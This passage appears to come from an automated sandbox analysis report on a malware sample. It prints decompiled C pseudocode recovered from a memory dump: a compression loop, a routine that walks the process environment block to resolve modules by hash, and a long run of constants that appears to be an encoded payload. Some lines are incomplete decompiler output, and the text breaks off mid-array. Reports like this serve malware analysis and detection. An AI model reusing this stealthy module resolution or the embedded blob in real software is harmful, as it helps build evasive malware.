								_t250 = (( *(_t264 + _t274 + 0x90) & 0x000000ff) << 0x0000000a ^ _t219 & 0x000000ff) & 0x00007fff ^ ( *((_t279 + 0x00000001 & 0x00007fff) + _t274 + 0x90) & 0xff) << 0x00000005;
								 *((short*)(_t274 + 0x19272 + _t264 * 2)) =  *(_t274 + 0x29272 + _t250 * 2);
								_t257 = _v16;
								 *(_t274 + 0x29272 + _t250 * 2) = _t279;
								_t275 = _v12;
							}
						}
						goto L12;
					}
					_t203 =  *(_t274 + 0x1c) + _t224;
					_t281 = _t203 & 0x00007fff;
					_t220 = _t203 - 2;
					_t267 = ( *((_t220 & 0x00007fff) + _t274 + 0x90) & 0x000000ff) << 0x00000005 ^  *((_t220 + 0x00000001 & 0x00007fff) + _t274 + 0x90) & 0x000000ff;
					_t211 =  <  ? _v12 : 0x102 - _t224;
					_v12 = _v12 - 0x102;
					_t212 = ( <  ? _v12 : 0x102 - _t224) +  *((intOrPtr*)(_t274 + 0x20));
					_v28 = _v16 + 0x102;
					 *((intOrPtr*)(_t274 + 0x20)) = ( <  ? _v12 : 0x102 - _t224) +  *((intOrPtr*)(_t274 + 0x20));
					while(1) {
						_t253 = _v16;
						if(_t253 == _v28) {
							break;
						}
						_t213 =  *_t253;
						_v16 = _t253 + 1;
						 *(_t274 + _t281 + 0x90) = _t213;
						if(_t281 < 0x101) {
							 *(_t281 + _t274 + 0x8090) = _t213;
						}
						_t267 = (_t267 << 0x00000005 ^ _t213 & 0x000000ff) & 0x00007fff;
						_t281 = _t281 + 0x00000001 & 0x00007fff;
						 *((short*)(_t274 + 0x19272 + (_t220 & 0x00007fff) * 2)) =  *(_t274 + 0x29272 + _t267 * 2);
						 *(_t274 + 0x29272 + _t267 * 2) = _t220;
						_t220 = _t220 + 1;
					}
					_t275 = _v12;
					goto L12;
				}
				L61:
				 *((intOrPtr*)(_t274 + 0x84)) = _t257;
				 *((intOrPtr*)(_t274 + 0x88)) = _t275;
				return 1;
			}













































                  0x00404376
                  0x00404378
                  0x0040437e
                  0x00404384
                  0x0040438a
                  0x0040438d
                  0x00404390
                  0x00000000
                  0x00404398
                  0x004043b0
                  0x004043b8
                  0x004045c5
                  0x00404527
                  0x0040446d
                  0x0040446d
                  0x0040447c
                  0x00404483
                  0x00404486
                  0x00404497
                  0x0040449e
                  0x0040449f
                  0x004044a3
                  0x004044af
                  0x004044b6
                  0x004044b9
                  0x004044bc
                  0x004044bf
                  0x004045e5
                  0x004045ea
                  0x004045ed
                  0x004045f0
                  0x004045f3
                  0x004045f6
                  0x004045f9
                  0x00404603
                  0x00404605
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00404615
                  0x00404615
                  0x00404615
                  0x00404617
                  0x00404619
                  0x00404619
                  0x0040461e
                  0x0040465e
                  0x00404683
                  0x004046ba
                  0x004046bf
                  0x004046c0
                  0x00000000
                  0x00404696
                  0x0040469f
                  0x004046a2
                  0x004046aa
                  0x004046ad
                  0x004046b0
                  0x0040467a
                  0x0040467a
                  0x004046c2
                  0x004046c2
                  0x004046ca
                  0x004046d0
                  0x004046d6
                  0x004046df
                  0x004046e2
                  0x004046e7
                  0x0040471f
                  0x00404724
                  0x00404729
                  0x0040472f
                  0x0040473a
                  0x0040473e
                  0x00000000
                  0x00404760
                  0x00404740
                  0x00404395
                  0x00404395
                  0x00000000
                  0x00404395
                  0x004046f0
                  0x004046f3
                  0x004046f6
                  0x00000000
                  0x00000000
                  0x0040470d
                  0x00000000
                  0x00000000
                  0x00404716
                  0x00404719
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00404719
                  0x00404683
                  0x00404669
                  0x00404675
                  0x00000000
                  0x00404675
                  0x00404620
                  0x00404624
                  0x0040464c
                  0x00404655
                  0x00404656
                  0x00000000
                  0x00404656
                  0x00404629
                  0x00404634
                  0x00404644
                  0x00000000
                  0x00404644
                  0x00404639
                  0x0040463e
                  0x00000000
                  0x0040463e
                  0x004045f9
                  0x004044c7
                  0x004044c9
                  0x004044df
                  0x004044ed
                  0x004044f2
                  0x004045d2
                  0x004045d2
                  0x00000000
                  0x004045d2
                  0x004044f8
                  0x004044fb
                  0x004044fe
                  0x00404507
                  0x0040450a
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040450a
                  0x0040450c
                  0x00404512
                  0x00000000
                  0x00000000
                  0x0040451a
                  0x0040451a
                  0x00000000
                  0x00404748
                  0x00404748
                  0x00000000
                  0x00404748
                  0x00404486
                  0x00404533
                  0x00404535
                  0x0040453a
                  0x0040453b
                  0x0040453c
                  0x0040453f
                  0x00404542
                  0x0040454e
                  0x00404550
                  0x00404550
                  0x00404557
                  0x0040455d
                  0x00404565
                  0x0040456d
                  0x00404574
                  0x004045a5
                  0x004045af
                  0x004045b7
                  0x004045ba
                  0x004045c2
                  0x004045c2
                  0x00404565
                  0x00000000
                  0x004045cd
                  0x004043c1
                  0x004043c5
                  0x004043cb
                  0x004043f0
                  0x004043ff
                  0x00404403
                  0x00404408
                  0x0040440b
                  0x0040440e
                  0x00404462
                  0x00404462
                  0x00404468
                  0x00000000
                  0x00000000
                  0x00404413
                  0x00404416
                  0x00404419
                  0x00404426
                  0x00404428
                  0x00404428
                  0x0040443e
                  0x00404443
                  0x00404451
                  0x00404459
                  0x00404461
                  0x00404461
                  0x0040446a
                  0x00000000
                  0x0040446a
                  0x0040474b
                  0x0040474d
                  0x00404753
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ae03f3a372626642b1fb26106d35d9b0dbeac125857d4feb9d457580f34e28b3
                  • Instruction ID: e33084252fcec48e949ebcca89b2b69e4ca8ec5097f1102ae8c543975fbc8947
                  • Opcode Fuzzy Hash: ae03f3a372626642b1fb26106d35d9b0dbeac125857d4feb9d457580f34e28b3
                  • Instruction Fuzzy Hash: 4FC1C271B04916ABCB18CE68C4907BAF7F1BF89304F04427ED659A7781D73CA855CB88
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 004012CD, Relevance: .0, Instructions: 23COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004012CD(void* __ecx) {
				void* _t8;
				intOrPtr* _t12;
				intOrPtr* _t13;

				_t8 = __ecx;
				_t12 =  *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc;
				_t13 =  *_t12;
				while(_t13 != _t12) {
					if(E00401161( *((intOrPtr*)(_t13 + 0x30))) == _t8) {
						return  *((intOrPtr*)(_t13 + 0x18));
					}
					_t13 =  *_t13;
				}
				return 0;
			}






                  0x004012d9
                  0x004012db
                  0x004012de
                  0x004012f0
                  0x004012ec
                  0x00000000
                  0x004012fa
                  0x004012ee
                  0x004012ee
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c4bdfc313c746a2cb64b2d13bd71f69938b88e51a1103363138794cfe1d3b908
                  • Instruction ID: 7ecbe99e9aff7bbd4a6860067150bf6fe1a6c3b143e7c3a6fabfcc45b8fe1074
                  • Opcode Fuzzy Hash: c4bdfc313c746a2cb64b2d13bd71f69938b88e51a1103363138794cfe1d3b908
                  • Instruction Fuzzy Hash: EFE086333104508BC720DA99C480857F3F9EB84370B2908BFE546F7A61C338BC019688
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 00401E04, Relevance: .0, Instructions: 3COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00401E04() {

				return  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
			}



                  0x00401e10

                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 98b478bd1af69a2275d0ab39f1ac079ffe73a0c4551ec61df12d917ad4ecd62f
                  • Instruction ID: dd1ea78877d89c8c1f21003391c56dd86dd10fe21c56db2a52adb93900471d7c
                  • Opcode Fuzzy Hash: 98b478bd1af69a2275d0ab39f1ac079ffe73a0c4551ec61df12d917ad4ecd62f
                  • Instruction Fuzzy Hash: 8EA00275752980CFCE12CB09C394F9073F4F744B41F0504F1E80997A11C238A900CA00
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 00408CD5, Relevance: 33.7, APIs: 1, Strings: 18, Instructions: 413libraryUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 83%
                  			E00408CD5(void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				intOrPtr _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				intOrPtr _v340;
				intOrPtr _v344;
				intOrPtr _v348;
				intOrPtr _v352;
				intOrPtr _v356;
				intOrPtr _v360;
				intOrPtr _v364;
				intOrPtr _v368;
				intOrPtr _v372;
				intOrPtr _v376;
				intOrPtr _v380;
				intOrPtr _v384;
				intOrPtr _v388;
				intOrPtr _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				intOrPtr _v404;
				intOrPtr _v408;
				intOrPtr _v412;
				intOrPtr _v416;
				intOrPtr _v420;
				intOrPtr _v424;
				intOrPtr _v428;
				intOrPtr _v432;
				intOrPtr _v436;
				intOrPtr _v440;
				intOrPtr _v444;
				intOrPtr _v448;
				intOrPtr _v452;
				intOrPtr _v456;
				intOrPtr _v460;
				intOrPtr _v464;
				intOrPtr _v468;
				intOrPtr _v472;
				intOrPtr _v476;
				intOrPtr _v480;
				intOrPtr _v484;
				intOrPtr _v488;
				intOrPtr _v492;
				intOrPtr _v496;
				intOrPtr _v500;
				intOrPtr _v504;
				intOrPtr _v508;
				intOrPtr _v512;
				intOrPtr _v516;
				intOrPtr _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				intOrPtr _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				intOrPtr _v604;
				intOrPtr _v608;
				intOrPtr _v612;
				intOrPtr _v616;
				intOrPtr _v620;
				intOrPtr _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				intOrPtr _v672;
				intOrPtr _v676;
				intOrPtr _v680;
				intOrPtr _v684;
				intOrPtr _v688;
				intOrPtr _v692;
				intOrPtr _v696;
				intOrPtr _v700;
				intOrPtr _v704;
				intOrPtr _v708;
				intOrPtr _v712;
				intOrPtr _v716;
				intOrPtr _v720;
				intOrPtr _v724;
				intOrPtr _v728;
				intOrPtr _v732;
				intOrPtr _v736;
				intOrPtr _v740;
				intOrPtr _v744;
				intOrPtr _v748;
				intOrPtr _v752;
				intOrPtr _v756;
				intOrPtr _v760;
				intOrPtr _v764;
				intOrPtr _v768;
				intOrPtr _v772;
				intOrPtr _v776;
				intOrPtr _v780;
				intOrPtr _v784;
				intOrPtr _v788;
				intOrPtr _v792;
				intOrPtr _v796;
				intOrPtr _v800;
				intOrPtr _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _v816;
				intOrPtr _v820;
				intOrPtr _v824;
				intOrPtr _v828;
				intOrPtr _v832;
				intOrPtr _v836;
				intOrPtr _v840;
				intOrPtr _v844;
				intOrPtr _v848;
				intOrPtr _v852;
				intOrPtr _v856;
				intOrPtr _v860;
				intOrPtr _v864;
				intOrPtr _v868;
				intOrPtr _v872;
				intOrPtr _v876;
				intOrPtr _v880;
				intOrPtr _v884;
				intOrPtr _v888;
				intOrPtr _v892;
				intOrPtr _v896;
				intOrPtr _v900;
				intOrPtr _v904;
				intOrPtr _v908;
				intOrPtr _v912;
				intOrPtr _v916;
				intOrPtr _v920;
				intOrPtr _v924;
				intOrPtr _v928;
				intOrPtr _v932;
				intOrPtr _v936;
				intOrPtr _v940;
				intOrPtr _v944;
				intOrPtr _v948;
				intOrPtr _v952;
				intOrPtr _v956;
				intOrPtr _v960;
				intOrPtr _v964;
				intOrPtr _v968;
				intOrPtr _v972;
				intOrPtr _v976;
				intOrPtr _v980;
				intOrPtr _v984;
				intOrPtr _v988;
				intOrPtr _v992;
				intOrPtr _v996;
				intOrPtr _v1000;
				intOrPtr _v1004;
				intOrPtr _v1008;
				intOrPtr _v1012;
				intOrPtr _v1016;
				intOrPtr _v1020;
				intOrPtr _v1024;
				intOrPtr _v1028;
				intOrPtr _v1032;
				intOrPtr _v1036;
				intOrPtr _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				intOrPtr _v1060;
				intOrPtr _v1064;
				intOrPtr _v1068;
				intOrPtr _v1072;
				intOrPtr _v1076;
				intOrPtr _v1080;
				intOrPtr _v1084;
				intOrPtr _v1088;
				intOrPtr _v1092;
				intOrPtr _v1096;
				intOrPtr _v1100;
				intOrPtr _v1104;
				intOrPtr _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				intOrPtr _v1120;
				intOrPtr _v1124;
				intOrPtr _v1128;
				intOrPtr _v1132;
				intOrPtr _v1136;
				intOrPtr _v1140;
				intOrPtr _v1144;
				intOrPtr _v1148;
				intOrPtr _v1152;
				intOrPtr _v1156;
				intOrPtr _v1160;
				intOrPtr _v1164;
				intOrPtr _v1168;
				intOrPtr _v1172;
				intOrPtr _v1176;
				intOrPtr _v1180;
				intOrPtr _v1184;
				intOrPtr _v1188;
				intOrPtr _v1192;
				intOrPtr _v1196;
				intOrPtr _v1200;
				intOrPtr _v1204;
				intOrPtr _v1208;
				intOrPtr _v1212;
				intOrPtr _v1216;
				intOrPtr _v1220;
				intOrPtr _v1224;
				intOrPtr _v1228;
				intOrPtr _v1232;
				intOrPtr _v1236;
				intOrPtr _v1240;
				intOrPtr _v1244;
				intOrPtr _v1248;
				intOrPtr _v1252;
				intOrPtr _v1256;
				intOrPtr _v1260;
				intOrPtr _v1264;
				intOrPtr _v1268;
				intOrPtr _v1272;
				intOrPtr _v1276;
				intOrPtr _v1280;
				intOrPtr _v1284;
				intOrPtr _v1288;
				intOrPtr _v1292;
				intOrPtr _v1296;
				intOrPtr _v1300;
				intOrPtr _v1304;
				intOrPtr _v1308;
				intOrPtr _v1312;
				intOrPtr _v1316;
				intOrPtr _v1320;
				intOrPtr _v1324;
				intOrPtr _v1328;
				intOrPtr _v1332;
				intOrPtr _v1336;
				intOrPtr _v1340;
				intOrPtr _v1344;
				intOrPtr _v1348;
				intOrPtr _v1352;
				intOrPtr _v1356;
				intOrPtr _v1360;
				intOrPtr _v1364;
				intOrPtr _v1368;
				intOrPtr _v1372;
				intOrPtr _v1376;
				intOrPtr _v1380;
				intOrPtr _v1384;
				intOrPtr _v1388;
				intOrPtr _v1392;
				intOrPtr _v1396;
				intOrPtr _v1400;
				intOrPtr _v1404;
				intOrPtr _v1408;
				intOrPtr _v1412;
				intOrPtr _v1416;
				intOrPtr _v1420;
				intOrPtr _v1424;
				intOrPtr _v1428;
				intOrPtr _v1432;
				intOrPtr _v1436;
				intOrPtr _v1440;
				intOrPtr _v1444;
				intOrPtr _v1448;
				intOrPtr _v1452;
				intOrPtr _v1456;
				intOrPtr _v1460;
				intOrPtr _v1464;
				intOrPtr _v1468;
				intOrPtr _v1472;
				intOrPtr _v1476;
				intOrPtr _v1480;
				intOrPtr _v1484;
				intOrPtr _v1488;
				intOrPtr _v1492;
				intOrPtr _v1496;
				intOrPtr _v1500;
				intOrPtr _v1504;
				intOrPtr _v1508;
				intOrPtr _v1512;
				intOrPtr _v1516;
				intOrPtr _v1520;
				intOrPtr _v1524;
				intOrPtr _v1528;
				intOrPtr _v1532;
				intOrPtr _v1536;
				intOrPtr _v1540;
				intOrPtr _v1544;
				intOrPtr _v1548;
				intOrPtr _v1552;
				intOrPtr _v1556;
				char _v1560;

				_v1560 = 0x4befb69c;
				_v1556 = 0xe2a7d93;
				_v1552 = 0xec58315b;
				_v1548 = 0xf479b9e5;
				_v1544 = 0x3655e0b3;
				_v1540 = 0x1788529f;
				_v1536 = 0xf8a87d29;
				_v1532 = 0x6a1c103e;
				_v1528 = 0xa3a4c637;
				_v1524 = 0xdd4d869a;
				_v1520 = 0xda58f7da;
				_v1516 = 0xa4aa4a18;
				_v1512 = 0xf64937e7;
				_v1508 = 0xa4ae6a93;
				_v1504 = 0x4a93dd70;
				_v1500 = 0x15b491d3;
				_v1496 = 0xb70e4dcf;
				_v1492 = 0xfb7fcaa2;
				_v1488 = 0x5ce8c08f;
				_v1484 = 0x83c7a18c;
				_v1480 = 0x6c649979;
				_v1476 = 0x8a267553;
				_v1472 = 0x14352803;
				_v1468 = 0xf6f6795d;
				_v1464 = 0xcc94b246;
				_v1460 = 0xbe9f1468;
				_v1456 = 0x3ef68f3a;
				_v1452 = 0x8360e0ee;
				_v1448 = 0xdd8b73c8;
				_v1444 = 0xfc9700e;
				_v1440 = 0x718d1c8;
				_v1436 = 0xffb7254;
				_v1432 = 0x286ed90a;
				_v1428 = 0x1b23db2c;
				_v1424 = 0xda2233ed;
				_v1420 = 0xbc53fd27;
				_v1416 = 0xde98ddd2;
				_v1412 = 0xb4314b61;
				_v1408 = 0xea162a4;
				_v1404 = 0xc02a9ba2;
				_v1400 = 0x967ce52;
				_v1396 = 0xabfbe251;
				_v1392 = 0x175cb512;
				_v1388 = 0xf8447fac;
				_v1384 = 0x2eac2eac;
				_v1380 = 0xf4344c6a;
				_v1376 = 0xbbdcaee3;
				_v1372 = 0xe99636da;
				_v1368 = 0x13a7e5e1;
				_v1364 = 0xff3c9bed;
				_v1360 = 0x8dbfbd40;
				_v1356 = 0xb185ff34;
				_v1352 = 0xcace94c2;
				_v1348 = 0xc80d6527;
				_v1344 = 0xa606e2ad;
				_v1340 = 0x6ae37e45;
				_v1336 = 0x282fa05a;
				_v1332 = 0x88a6d551;
				_v1328 = 0x1ff98e41;
				_v1324 = 0x5afaf771;
				_v1320 = 0xebf0ac61;
				_v1316 = 0x51130de3;
				_v1312 = 0xa1336917;
				_v1308 = 0x7a2f88ee;
				_v1304 = 0x718b7c64;
				_v1300 = 0xf2ab104c;
				_v1296 = 0xb1a7a998;
				_v1292 = 0x268c77d7;
				_v1288 = 0x9a6fd234;
				_v1284 = 0x60166448;
				_v1280 = 0xe602cf3d;
				_v1276 = 0x71c5ac19;
				_v1272 = 0xd33a43b2;
				_v1268 = 0x27eb747f;
				_v1264 = 0x1470ea9a;
				_v1260 = 0xa144ffe1;
				_v1256 = 0xd6d9720b;
				_v1252 = 0x9286eb36;
				_v1248 = 0x2aefe3bd;
				_v1244 = 0xed564a2f;
				_v1240 = 0xa9426475;
				_v1236 = 0x2bf8a593;
				_v1232 = 0xd0a447e5;
				_v1228 = 0x48052515;
				_v1224 = 0x3e8ebb64;
				_v1220 = 0xfe618b29;
				_v1216 = 0x751b8d9a;
				_v1212 = 0xd44d92f4;
				_v1208 = 0x5d775a9c;
				_v1204 = 0x62856083;
				_v1200 = 0xf5056c81;
				_v1196 = 0x29043594;
				_v1192 = 0x4ba08155;
				_v1188 = 0x2b9a15db;
				_v1184 = 0x15929201;
				_v1180 = 0x3631bff8;
				_v1176 = 0x959afeae;
				_v1172 = 0x1b996608;
				_v1168 = 0x9f6b0905;
				_v1164 = 0x6541544e;
				_v1160 = 0x3b4276c2;
				_v1156 = 0x449b5732;
				_v1152 = 0xeeda9290;
				_v1148 = 0xdcaa8116;
				_v1144 = 0xa1baec1f;
				_v1140 = 0x1470c0f3;
				_v1136 = 0x3e6a5a1a;
				_v1132 = 0x3833bb5d;
				_v1128 = 0xdb45c3d4;
				_v1124 = 0x27574c46;
				_v1120 = 0xa80b0835;
				_v1116 = 0xfcd6c910;
				_v1112 = 0xe990762e;
				_v1108 = 0xe0d8e335;
				_v1104 = 0x34abe755;
				_v1100 = 0x56597a74;
				_v1096 = 0xb103ce43;
				_v1092 = 0xef319e25;
				_v1088 = 0x22a91b8d;
				_v1084 = 0xf82edbd2;
				_v1080 = 0x3b4b8d37;
				_v1076 = 0x338cfe68;
				_v1072 = 0xf29573ff;
				_v1068 = 0x563e81d6;
				_v1064 = 0x548c86c1;
				_v1060 = 0x4468b232;
				_v1056 = 0xede258c9;
				_v1052 = 0x7c8c7e70;
				_v1048 = 0xd17a549a;
				_v1044 = 0xaf47054c;
				_v1040 = 0x8e7aa5fb;
				_v1036 = 0xda162cad;
				_v1032 = 0x7f4adfe2;
				_v1028 = 0xb42a2fff;
				_v1024 = 0x7179f28c;
				_v1020 = 0xcf51a6c7;
				_v1016 = 0xb6332844;
				_v1012 = 0xfdcdaa4c;
				_v1008 = 0xb14c459d;
				_v1004 = 0x7564d49e;
				_v1000 = 0x8f70fe3c;
				_v996 = 0xdc36cd7d;
				_v992 = 0x63e63e71;
				_v988 = 0x5edb739d;
				_v984 = 0x1cd504ef;
				_v980 = 0x93b57070;
				_v976 = 0x28a54980;
				_v972 = 0x64ef1114;
				_v968 = 0xed02e6be;
				_v964 = 0xabe7464c;
				_v960 = 0xe34a9f4f;
				_v956 = 0x38e0f1e6;
				_v952 = 0xec04582b;
				_v948 = 0x61693d0f;
				_v944 = 0xe21a0b35;
				_v940 = 0xc48c0b6a;
				_v936 = 0xfc0bfcd2;
				_v932 = 0xe781bd04;
				_v928 = 0x148c9f07;
				_v924 = 0x29cccea2;
				_v920 = 0xae046087;
				_v916 = 0x170e2607;
				_v912 = 0xfb9e28d9;
				_v908 = 0xc5f3c745;
				_v904 = 0x2064696d;
				_v900 = 0xfffefc0b;
				_v896 = 0xf75d58e6;
				_v892 = 0xdd0c0350;
				_v888 = 0xee345fd5;
				_v884 = 0x15c0bc71;
				_v880 = 0xfc21594b;
				_v876 = 0xf7d17b82;
				_v872 = 0xc53fb9bc;
				_v868 = 0x3db78dd2;
				_v864 = 0x5aa3eff4;
				_v860 = 0x4ffb8986;
				_v856 = 0x679dc3d7;
				_v852 = 0xf57679b7;
				_v848 = 0xd4a33e35;
				_v844 = 0x17525c45;
				_v840 = 0x2f705952;
				_v836 = 0x4709a022;
				_v832 = 0xe1344555;
				_v828 = 0xd80a835f;
				_v824 = 0x615f5253;
				_v820 = 0x5433de81;
				_v816 = 0x54f130f8;
				_v812 = 0x4823fa93;
				_v808 = 0xb927d63b;
				_v804 = 0xa075442;
				_v800 = 0xf027a5bf;
				_v796 = 0x1ff6d87a;
				_v792 = 0x717d95e8;
				_v788 = 0xc7adf187;
				_v784 = 0x41178485;
				_v780 = 0xd28e7ea8;
				_v776 = 0xd30c5935;
				_v772 = 0x323cce37;
				_v768 = 0x3b66b84b;
				_v764 = 0x93a4a480;
				_v760 = 0xc6f91e4c;
				_v756 = 0x878d3e1c;
				_v752 = 0xacbe73e0;
				_v748 = 0x39411ffd;
				_v744 = 0x51956353;
				_v740 = 0xeae86d79;
				_v736 = 0x74761c39;
				_v732 = 0x61d7b190;
				_v728 = 0xa072a497;
				_v724 = 0x958dee7a;
				_v720 = 0x9e671c60;
				_v716 = 0xd2430678;
				_v712 = 0x94c08196;
				_v708 = 0x965ab2f9;
				_v704 = 0x29b1888a;
				_v700 = 0x32e7db29;
				_v696 = 0xc7764655;
				_v692 = 0x6f1caa55;
				_v688 = 0x9eb0d2f;
				_v684 = 0x880161c9;
				_v680 = 0xa1c00ce3;
				_v676 = 0xc1d28a66;
				_v672 = 0xcc72ca45;
				_v668 = 0x97b55c25;
				_v664 = 0x8558f7e3;
				_v660 = 0x8ac5a732;
				_v656 = 0x6245af98;
				_v652 = 0xabcc6957;
				_v648 = 0x7e544f4d;
				_v644 = 0x43da5efa;
				_v640 = 0x781609ef;
				_v636 = 0x4617ba68;
				_v632 = 0xdfef7616;
				_v628 = 0x999614b7;
				_v624 = 0xb1861e95;
				_v620 = 0xe7f3ecef;
				_v616 = 0x74d5be3b;
				_v612 = 0x3fc5e28;
				_v608 = 0x1dd16ad;
				_v604 = 0x1052e4f9;
				_v600 = 0x65c2038a;
				_v596 = 0xd0c421c0;
				_v592 = 0xbc4682ff;
				_v588 = 0x32e7b9aa;
				_v584 = 0xd10fbd07;
				_v580 = 0xedbcb66b;
				_v576 = 0x2000143;
				_v572 = 0xcb14edfd;
				_v568 = 0xcf05854d;
				_v564 = 0xa88f0fe2;
				_v560 = 0xb803256e;
				_v556 = 0xb644a825;
				_v552 = 0xeeba0c9d;
				_v548 = 0x388db315;
				_v544 = 0x76b2629a;
				_v540 = 0xf626cd97;
				_v536 = 0x5ffbfc65;
				_v532 = 0x63532dab;
				_v528 = 0xc99a8036;
				_v524 = 0x3db019be;
				_v520 = 0xb8a25e3b;
				_v516 = 0x27c55253;
				_v512 = 0x64213913;
				_v508 = 0x1fc02174;
				_v504 = 0x74194bd1;
				_v500 = 0xc2830dba;
				_v496 = 0x59201bb3;
				_v492 = 0xf0a50b26;
				_v488 = 0x30a58ab3;
				_v484 = 0xe5059002;
				_v480 = 0xf326a3d3;
				_v476 = 0x98f99278;
				_v472 = 0xe9d966bc;
				_v468 = 0xab4cde5d;
				_v464 = 0x808fb1a1;
				_v460 = 0xd56d9e3e;
				_v456 = 0x4fc3d42f;
				_v452 = 0xe97c9080;
				_v448 = 0x5fec54a8;
				_v444 = 0x554cc6e2;
				_v440 = 0x7ae3fc51;
				_v436 = 0x3db9e987;
				_v432 = 0x270657d8;
				_v428 = 0x91df6386;
				_v424 = 0xa06420f6;
				_v420 = 0xb645fca2;
				_v416 = 0x9c6867fb;
				_v412 = 0x519fe36b;
				_v408 = 0xb7531c61;
				_v404 = 0xf5fc84f3;
				_v400 = 0x26cd3d1f;
				_v396 = 0x472b53f7;
				_v392 = 0xf96b6641;
				_v388 = 0xabeb68fc;
				_v384 = 0xeff2f92;
				_v380 = 0x12bd2dda;
				_v376 = 0xad0b7b64;
				_v372 = 0x1ba50940;
				_v368 = 0xd9508423;
				_v364 = 0x5b6a112d;
				_v360 = 0x4c072a9e;
				_v356 = 0xcd632d88;
				_v352 = 0x86676816;
				_v348 = 0x11d5ce75;
				_v344 = 0x4d839846;
				_v340 = 0x61a20281;
				_v336 = 0x7d4b08cc;
				_v332 = 0xe75e3c98;
				_v328 = 0xa09673de;
				_v324 = 0x4fcdca3;
				_v320 = 0x87caecd;
				_v316 = 0x8bb0de23;
				_v312 = 0x8bb4e855;
				_v308 = 0xd5e4f17c;
				_v304 = 0x6ce7b55c;
				_v300 = 0x2917ee1f;
				_v296 = 0xb765a1eb;
				_v292 = 0x17313737;
				_v288 = 0x491b73e5;
				_v284 = 0x60893bf9;
				_v280 = 0x8ed66181;
				_v276 = 0xd3c82709;
				_v272 = 0x74742dcc;
				_v268 = 0xb70f62bb;
				_v264 = 0x46e9044d;
				_v260 = 0xddfb36c2;
				_v256 = 0x1c14621e;
				_v252 = 0x3bba477e;
				_v248 = 0x1f5f3936;
				_v244 = 0xb8113197;
				_v240 = 0x1a909f95;
				_v236 = 0x2ff6f937;
				_v232 = 0x906b0598;
				_v228 = 0xeb5ff201;
				_v224 = 0x6f534f00;
				_v220 = 0x396a258d;
				_v216 = 0xdc74f9cd;
